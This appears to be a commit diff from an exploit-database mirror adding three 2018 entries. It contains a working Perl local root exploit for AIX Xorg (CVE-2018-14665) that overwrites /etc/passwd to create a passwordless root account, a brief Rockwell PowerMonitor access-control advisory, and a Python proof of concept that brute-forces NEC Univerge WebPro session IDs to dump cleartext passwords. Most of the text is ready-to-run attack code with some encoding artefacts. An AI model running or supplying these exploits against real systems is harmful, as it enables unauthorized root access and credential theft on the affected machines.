codegate
diff --git a/‎exploits/aix/local/45938.pl‎
Lines changed: 149 additions & 0 deletions b/‎exploits/aix/local/45938.pl‎
Lines changed: 149 additions & 0 deletions
diff --git a/‎exploits/hardware/webapps/45937.txt‎
Lines changed: 15 additions & 0 deletions b/‎exploits/hardware/webapps/45937.txt‎
Lines changed: 15 additions & 0 deletions
diff --git a/‎exploits/hardware/webapps/45942.py‎
Lines changed: 178 additions & 0 deletions b/‎exploits/hardware/webapps/45942.py‎
Lines changed: 178 additions & 0 deletions
@@ -0,0 +1,149 @@
+# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation
+# Date: 29/11/2018
+# Exploit Author: @0xdono
+# Original Discovery and Exploit: Narendra Shinde
+# Vendor Homepage: https://www.x.org/
+# Platform: AIX
+# Version: X Window System Version 7.1.1
+# Fileset: X11.base.rte < 7.1.5.32
+# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)
+# CVE: CVE-2018-14665
+#
+# Explanation:
+# Incorrect command-line parameter validation in the Xorg X server can
+# lead to privilege elevation and/or arbitrary files overwrite, when the
+# X server is running with elevated privileges.
+# The -logfile argument can be used to overwrite arbitrary files in the
+# file system, due to incorrect checks in the parsing of the option.
+#
+# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.
+# It overwrites /etc/passwd in order to create a new user with root privile=
+ges.=20
+# All currently logged in users need to be included when /etc/passwd is ove=
+rwritten,
+# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to ch=
+ange user.
+# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX=
+,
+# and is replaced by '-config'.
+# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.
+#
+# IBM has not yet released a patch as of 29/11/2018.
+#
+# See also:
+# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
+# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
+# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl
+#
+# Usage:
+#  $ oslevel -s
+#  7100-04-00-0000
+#  $ Xorg -version
+# =20
+#  X Window System Version 7.1.1
+#  Release Date: 12 May 2006
+#  X Protocol Version 11, Revision 0, Release 7.1.1
+#  Build Operating System: AIX IBM
+#  Current Operating System: AIX sovma470 1 7 00C3C6F54C00
+#  Build Date: 07 July 2006
+#          Before reporting problems, check http://wiki.x.org
+#          to make sure that you have the latest version.
+#  Module Loader present
+#  $ id
+#  uid=3D16500(nmyo) gid=3D1(staff)
+#  $ perl aixxorg.pl
+#  [+] AIX X11 server local root exploit
+#  [-] Checking for Xorg and ksh93=20
+#  [-] Opening /etc/passwd=20
+#  [-] Retrieving currently logged in users=20
+#  [-] Generating Xorg command=20
+#  [-] Opening /tmp/wow.ksh=20
+#  [-] Writing Xorg command to /tmp/wow.ksh=20
+#  [-] Backing up /etc/passwd to /tmp/passwd.backup=20
+#  [-] Making /tmp/wow.ksh executable=20
+#  [-] Executing /tmp/wow.ksh=20
+#  [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh=20
+#  [-] Done=20
+#  [+] 'su wow' for root shell=20
+#  $ su wow
+#  # id
+#  uid=3D0(root) gid=3D0(system)
+#  # whoami
+#  root
+
+#!/usr/bin/perl
+print "[+] AIX X11 server local root exploit\n";
+
+# Check Xorg is in path
+print "[-] Checking for Xorg and ksh93 \n";
+chomp($xorg =3D `command -v Xorg`);
+if ($xorg eq ""){=20
+    print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";
+    exit;
+}
+
+# Check ksh93 is in path
+chomp($ksh =3D `command -v ksh93`);
+if ($ksh eq ""){
+    print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";
+    exit;
+}
+
+# Read in /etc/passwd
+print "[-] Opening /etc/passwd \n";
+open($passwd_fh, '<', "/etc/passwd");
+chomp(@passwd_array =3D <$passwd_fh>);
+close($passwd_fh);
+
+# Retrieve currently logged in users
+print "[-] Retrieving currently logged in users \n";
+@users =3D `who | cut -d' ' -f1 | sort | uniq`;
+chomp(@users);
+
+# For all logged in users, add their current passwd entry to string
+# that will be used to overwrite passwd
+$users_logged_in_passwd =3D '';
+foreach my $user (@users)
+{
+    $user .=3D ":";
+    foreach my $line (@passwd_array)
+    {
+        if (index($line, $user) =3D=3D 0) {
+            $users_logged_in_passwd =3D $users_logged_in_passwd . '\n' . $l=
+ine;
+        }
+    }
+}
+
+# Use '-config' as '-fp' (which is used in the original BSD exploit) is not=
+ written to log
+print "[-] Generating Xorg command \n";
+$blob =3D '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/us=
+r/bin/ksh\n#' . '\'';
+
+print "[-] Opening /tmp/wow.ksh \n";=09=09
+open($fr, '>', "/tmp/wow.ksh");
+
+# Use ksh93 for ANSI-C quoting
+print "[-] Writing Xorg command to /tmp/wow.ksh \n";
+print $fr '#!' . "$ksh\n";
+print $fr "$xorg $blob -logfile ../etc/passwd :1  > /dev/null 2>&1 \n";
+close $fr;
+
+# Backup passwd=20
+print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";
+system("cp /etc/passwd /tmp/passwd.backup");
+
+# Make script executable and run it
+print "[-] Making /tmp/wow.ksh executable \n";
+system("chmod +x /tmp/wow.ksh");
+print "[-] Executing /tmp/wow.ksh \n";
+system("/tmp/wow.ksh");
+
+# Replace overwritten passwd with: original passwd + wow user
+print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";
+$result =3D `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0=
+::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;
+
+print "[-] Done \n";
+print "[+] 'su wow' for root shell \n";
@@ -0,0 +1,15 @@
+# Exploit Title: Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control
+# Date: 2018-11-27
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.rockwellautomation.com/
+# Version: 1408-EM3A-ENT B
+# Tested on: It is a proprietary devices: https://ab.rockwellautomation.com/zh/Energy-Monitoring/1408-PowerMonitor-1000
+# CVE : CVE-2018-19616
+
+# 1. Description:
+# In Rockwell Automation Allen-Bradley PowerMonitor 1000 web page, there are a few buttons are disabled,
+# such as “Edit”, “Remove”, “AddNew”, “Change Policy Holder” and “Security Configuration”.
+# View the source code of login page, those buttons/functions just use the “disabled” parameter to control the access right.
+# It is allow attackers using proxy to erase the “disabled” parameter, and enable those buttons/functions.
+# Once those buttons/functions are enabled.
+# Attackers is capable to add a new user who have administrator right.
@@ -0,0 +1,178 @@
+'''
+[+] Credits: hyp3rlinx
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/NEC-UNIVERGE-WEBPRO-v6.00-PREDICTABLE-SESSIONID-CLEARTEXT-PASSWORDS.txt
+[+] ISR: ApparitionSec   
+
+
+***Greetz: indoushka | Eduardo B. 0day***
+
+
+[Vendor]
+www.necam.com
+
+
+[Affected Product Code Base]
+NEC Univerge Sv9100 WebPro - 6.00.00
+
+
+NEC Univerge WebPro, is a web-based programming tool for the NEC Switch, which is used to program corporate Telephone systems.
+
+
+Public facing installations as of Dec 1, 2018
+https://www.shodan.io/search?query=Server+Henry
+Result: 7,797 
+
+
+[Vulnerability Type(s)]
+[CVE Reference(s)]
+Predictable Session ID - CVE-2018-11741 / Cleartext Password Storage - CVE-2018-11742
+
+
+[Attack Vectors]
+Make repeated remote HTTP requests until arriving at a valid authenticated sessionId.
+
+
+Security Issue:
+================
+NEC Univerge WebPro suffers from a "Predictable Session ID" that can potentially disclose all user account information including passwords stored in clear text in the Web UI.
+Attackers can simply increment numbers until arriving at a live session, then by using a specific URI dump the entire account information for all users including the clear text passwords.
+
+e.g..
+
+curl  http://NEC-VICTIM-IP/Home.htm?sessionId=12959&GOTO(8)
+
+
+Exploit/POC:
+=============
+'''
+
+from socket import *
+import re
+
+#Univerge Sv9100 NEC WebPro : 6.00
+#Dumps user accounts and plaintext passwords stored in Web UI in Administrator Programming Password Setup' webpage
+#http://TARGET-IP/Home.htm?sessionId=12959&GOTO(8) "GOTO(8)" will retrieve all account usernames and cleartext passwords.
+
+print "NEC Univerge Sv9100 WebPro - 6.00.00 / Remote 0day Exploit POC"
+print "hyp3rlinx"
+
+
+IP=raw_input("[+] TARGET> ")
+res=''
+findme="Programming Password Setup"
+cnt=0
+tmp=False
+tmp2=False
+pwned=False
+
+#check application is NEC and vuln version
+def is_NEC_webpro(u):
+    global tmp,tmp2,cnt
+    res=''
+    cnt+=1
+    s=socket(AF_INET, SOCK_STREAM)
+    s.connect((IP,80))
+    s.send('GET '+u+' HTTP/1.1\r\nHost: '+IP+'\r\n\r\n')
+
+    while True:
+        res=s.recv(4048)
+        if res.find('</html>')!=-1:
+            break   
+    s.close()
+    
+    if re.findall(r"\bWebPro\b", res):
+        tmp=True
+        if tmp and cnt < 3:
+            is_NEC_webpro('/Login.htm')
+            if re.findall(r"\b6.00.00\b", res) and re.findall(r"\bNEC Corporation of America\b", res):
+                tmp2 = True
+            if tmp == True and tmp2 == True:
+                return True
+    return False
+
+
+
+def dump(acct):
+    file=open('NEC-Accounts.txt', 'w')
+    file.write(acct+'\n')
+    file.close()
+
+
+def breach(sid):
+    global pwned
+    try:
+        s=socket(AF_INET, SOCK_STREAM)
+        s.connect((IP,80))
+        sid=str(sid)
+        print 'trying sessid '+sid
+        s.send('GET /Home.htm?sessionId%3d'+sid+'&GOTO(8)%20HTTP/1.1\r\nHost: '+IP+'\r\n\r\n')
+    except Exception as e:
+        print str(e)
+        
+    while True:
+        res = s.recv(4096)
+        if res.find('</html>')!=-1:
+            break
+        if re.findall(r"\bProgramming Password Setup\b",res)!=-1: ## We hit an active session.
+            dump(res)
+            print res
+            pwned=True
+       
+    s.close()
+    return pwned
+
+
+def sessgen():
+    for sessid in range(1000,15000): ##test 14109
+        if breach(sessid):
+            break
+
+
+if __name__=='__main__':
+    if is_NEC_webpro('/'):
+        sessgen()
+    else:
+        print 'Not NEC or version not vuln.'
+
+'''
+Network Access:
+===============
+Remote
+
+
+Severity:
+=========
+High
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification:  May 15, 2018
+No reply
+Vendor Notification: May 18, 2018
+No reply
+Vendor Notification:  June 4, 2018
+No reply
+Mitre assign CVE: June 5, 2018
+JPCERT replies: June 6, 2018
+JPCERT shares information with NEC : June 7, 2018
+Request status : August 11, 2018
+JPCERT contact NEC : August 14, 2018
+No reply from vendor
+Request status : August 21, 2018
+JPCERT again contacts NEC : August 21, 2018
+JPCERT "vendor working on a release" : August 23 2018
+JPCERT "Vendor release October 2018" : September 12, 2018
+NEC "Requests public disclosure after December 1st." : November 19, 2018
+December 2, 2018 : Public Disclosure
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+'''